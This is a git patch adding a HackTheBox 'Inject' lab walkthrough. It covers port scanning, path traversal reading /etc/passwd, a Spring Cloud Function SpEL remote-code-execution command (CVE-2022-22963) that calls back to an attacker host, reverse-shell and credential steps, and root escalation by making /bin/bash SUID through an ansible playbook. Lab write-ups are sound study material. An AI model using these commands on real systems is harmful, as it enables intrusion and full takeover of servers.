From 211b374d712bba35414cb8886233bbc12119f6cc Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Mon, 10 Jul 2023 22:13:11 +0300
Subject: [PATCH] Create Inject.md
---
HackTheBox/Inject.md | 130 +++++++++++++++++++++++++++++++++++++++++++
1 file changed, 130 insertions(+)
create mode 100644 HackTheBox/Inject.md
diff --git a/HackTheBox/Inject.md b/HackTheBox/Inject.md
new file mode 100644
index 0000000..903207c
--- /dev/null
+++ b/HackTheBox/Inject.md
@@ -0,0 +1,130 @@
+# HackTheBox - Inject
+## NMAP
+
+```
+Nmap scan report for 10.10.11.204
+Host is up (0.14s latency).
+Not shown: 65533 closed tcp ports (reset)
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
+| 256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
+|_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
+8080/tcp open nagios-nsca Nagios NSCA
+| http-methods:
+|_ Supported Methods: GET HEAD OPTIONS
+|_http-title: Home
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+```
+
+Scanning the machine, we have two ports out which port 8080 is interesting to us as there's a web server running
+
+## PORT 8080
+
+
+
+There's an option for login and signup but login doesn't take you anywhere so visting signup page
+
+
+
+There is however an option to upload files on the home page
+
+
+
+
+
+On trying to upload file normal txt file, it only shows that image file can be uploaded
+
+
+
+## Foothold
+
+I got exahausted for trying to upload php files but it didn't work and it was a huge rabbit hole for me but if we notice how it's fetching the uploaded files
+
+
+
+It's using a GET parameter for fetching the files, trying for LFI, it didn't showed any results on the browser but if we send a request from `curl` it will show that it's indeed vulnerable
+
+
+
+```
+curl 'http://10.10.11.204:8080/show_image?img=../../../../../../etc/passwd'
+```
+
+
+
+We can also see what files are there in the web root's directory by just traversing upto that path
+
+```
+curl 'http://10.10.11.204:8080/show_image?img=../../../'
+```
+
+
+
+We can read `pom.xml` file which tells about the infromation of the project
+
+
+
+
+
+Here we can find `Spring Framework cloud` version `3.2.2` being used, on searching for vulnerabilities, spring cloud function is vulnerable to remote code execution by `spring.cloud.function.routing-expression` paramter and SpEL (Spring Expression Language) to execute system commands on the machine
+
+```bash
+curl -X POST http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl 10.10.14.21")' --data-raw 'data'
+```
+
+
+
+To get a reverse shell, we can add our payload in a shell script, upload it and execute it on the server
+
+
+
+
+
+
+
+
+Stabilizing the shell with python
+
+
+
+## Privilege Escalation (Phil)
+
+We can escalate to phil user by getting his password from `.m2` directory in `settings.xml` file
+
+
+
+Checking in what groups this user is in
+
+
+
+With `find` we can look for files or folders on which this group has access
+
+
+
+Running `pspy` we can run see `ansible-playbook` being ran as root user and executing the yaml file
+
+
+
+## Privilege Escalation (root)
+
+We can escalate our privileges to root by `shell` paramter in our ansible yaml file to execute commands as root user `/opt/automation/tasks`
+
+```bash
+echo '[{hosts: localhost, tasks: [shell: 'chmod +s /bin/bash' ]}]' > playbook_2.yml
+```
+
+
+
+With `chmod +s /bin/bash` we can make bash a SUID meaning it will be executed as root on running it with `-p`
+
+
+
+
+
+## References
+
+- https://github.com/me2nuk/CVE-2022-22963
+- https://docs.ansible.com/ansible/2.9/modules/shell_module.html
+